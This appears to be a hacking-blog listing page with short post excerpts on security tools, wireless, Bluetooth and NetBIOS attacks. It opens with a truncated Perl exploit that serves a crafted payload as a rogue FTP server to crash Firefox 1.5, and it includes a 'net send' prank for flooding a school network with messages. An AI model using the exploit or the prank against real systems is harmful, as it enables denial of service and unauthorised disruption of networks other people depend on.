Mozilla Firefox FTP Request Remote DoS (Exploit)

Vulnerable Systems:*Mozilla Firefox version 1.5.0.6 and prior.Exploit:#!/usr/bin/perl#author: tomas kempinskyuse strict;use Socket;my $port = shift || 2121;my $proto = getprotobyname('tcp');my $payload = "\x32\x32\x30\x20\x5a\x0d\x0a\x33". "\x33\x31\x20\x5a\x0d\x0a\x35\x30". "\x30\x20\x44\x6f\x53\x0d\x0a\x35". "\x30\x30\x20\x5a\x0d\x0a";socket(SERVER, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";setsockopt(SERVER, SOL_SOCKET, SO_REUSEADDR, 1) or die "setsock: $!";my $paddr = sockaddr_in($port, INADDR_ANY); bind(SERVER, $paddr) or die "bind:...

Read More

BlueTooth Hacking Tools

Discovering Bluetooth Devices :- Before any two bluetooth enabled devices can start communicating with one another, they must carry out a procedure known as discovery. It can be carried out by scanning for other active devices within the range. Recommended   Tools ...

Read More

Wireless Hacking

Wireless networks broadcast their packets using radio frequency or optical wavelengths. A modern laptop computer can listen in. Worse, an attacker can manufacture new packets on the fly and persuade wireless stations to accept his packets as legitimate.The step by step procerdure in wireless hacking can be explained with help of different topics...

Read More

Email Security Best Practices from Microsoft

Over the years, Microsoft has taken its lumps when it comes to security however as a company, they have taken some pretty impressive strides to make sure that their products are more secure. However, their security efforts have not been limited to just their products. They have launched several educational campaigns aimed at helping users better secure their computers...

Read More

WebSurgery – Web Application Security Testing Suite

WebSurgery is a suite of tools for security testing of web applications. It was designed for security auditors to help them with the web application planning and exploitation. Currently, it uses an efficient, fast and stable Web Crawler, File/Dir Brute forcer, Fuzzer for advanced exploitation of known and unusual vulnerabilities such as SQL Injection, Cross site scripting (XSS), Brute force for login forms, identification of firewall-filtered rules, DOS Attacks and WEB Proxy to analyze, intercept and manipulate the traffic between your browser...

Read More

14 SepWAVSEP – Web Application Vulnerability Scanner Evaluation Project Want to Learn Penetration Testing

The author of WAVSEP (Shay Chen) e-mailed quite some time back about this project, but I have to say I honestly didn’t have time to look at it back then. It popped back up on my radar again when it was mentioned by the author of – Arachni v0.3 – his tool did extremely well in the WAVSEP tests.The benchmark tests the SQL Injection and Reflected XSS vulnerability detection accuracy of12 commercial web application scanners and 48 free & open source web application scanners, and discusses the capabilities of many others (including information...

Read More

Lilith – Web Application Security Audit Tool

LiLith is a tool written in Perl to audit web applications. This tool analyses webpages and looks for html form tags , which often refer to dynamic pages that might be subject to SQL injection or other flaws. It works as an ordinary spider and analyses pages, following hyperlinks, injecting special characters that have a special meaning to any underlying platform.Any Web applications scanner can never perform a full 100% correct audit. Therefore, a manual re-check is necessary. Hence, be aware that Lilith might come up with several false...

Read More

VeriSign Demands The Power To Take Down Websites/Domains

I was scanning the news today, and nothing much was going on. There were some half-arsed stories about Anonymous and LulzSec – but nothing really worth writing about. And then, and then I spotted this, which quite frankly scares the shit out of me.As much as it may well have a use in law enforcement, I’m sorry but I don’t want any single organization, corporation or entity to have the power to take out domains.It’s just plain wrong, and well the UK has already started tabling something like this back in September.VeriSign, which manages the...

Read More

DirBuster – Brute Force Directories & Files Names

DirBuster is another great tool from the OWASP chaps, it’s basically a multi threaded java application designed to brute force directories and files names on web/application servers. Often is the case now of what looks like a web server in a state of default installation is actually not, and has pages and applications hidden within. DirBuster attempts to find these.However tools of this nature are often as only good as the directory and file list they come with. A different approach was taken to generating this. The list was generated from...

Read More

Remote Network Penetration via NetBIOS- NetBios Hacking

These are basic techniques but very useful when penetration testing any Windows based network, the techniques were discovered on WinNT but are still very valid on Windows2000 and in some cases Windows2003 due to backwards compatibility.This article is being written in a procedural manner. I have approached it much like an intruder would actually approach a network penetration....

Read More

Messing With School Server

Sending messages out over the network Okay, here's how to send crazy messages to everyone in your school on a computer. In your command prompt, typeNet Send <domain> * "The server is h4x0r3d"*Note: <domain> may not be necessary, depending on how many your school has access too. If it's just one, you can leave it out*Where <domain> is, replace it with the domain name of your school. For instance, when you log on to the network, you should have a choice of where to log on, either to your school, or to just the local machine....

Read More

How to Block Websites & Stop Downloading Using Proxy

This example will explain you “How to Block Web Sites” & “How to Stop Downloading”.First, Configure Proxy.  /ip proxy set parent-proxy=0.0.0.0set parent-proxy-port=0set cache-administrator="webmaster"set max-cache-size=noneset cache-on-disk=noset max-client-connections=600set max-server-connections=600set max-fresh-time=3dset always-from-cache=noset cache-hit-dscp=4set serialize-connections=noNow, Make it Transparent /ip firewall natadd chain=dstnat protocol=tcp dst-port=80 action=dst-nat to-addresses=to-ports=8080Make sure that your proxy...

Read More

How Hackers Hack Your Website: Overview of Common Techniques

We hear the same terms bandied about whenever a popular site gets hacked. You know… SQL Injection, cross site scripting, that kind of thing. But what do these things mean? Is hacking really as inaccessible as many of us imagine — a nefarious, impossibly technical twilight world forever beyond our ken?Not really.When you consider that you can go to Google right now and...

Read More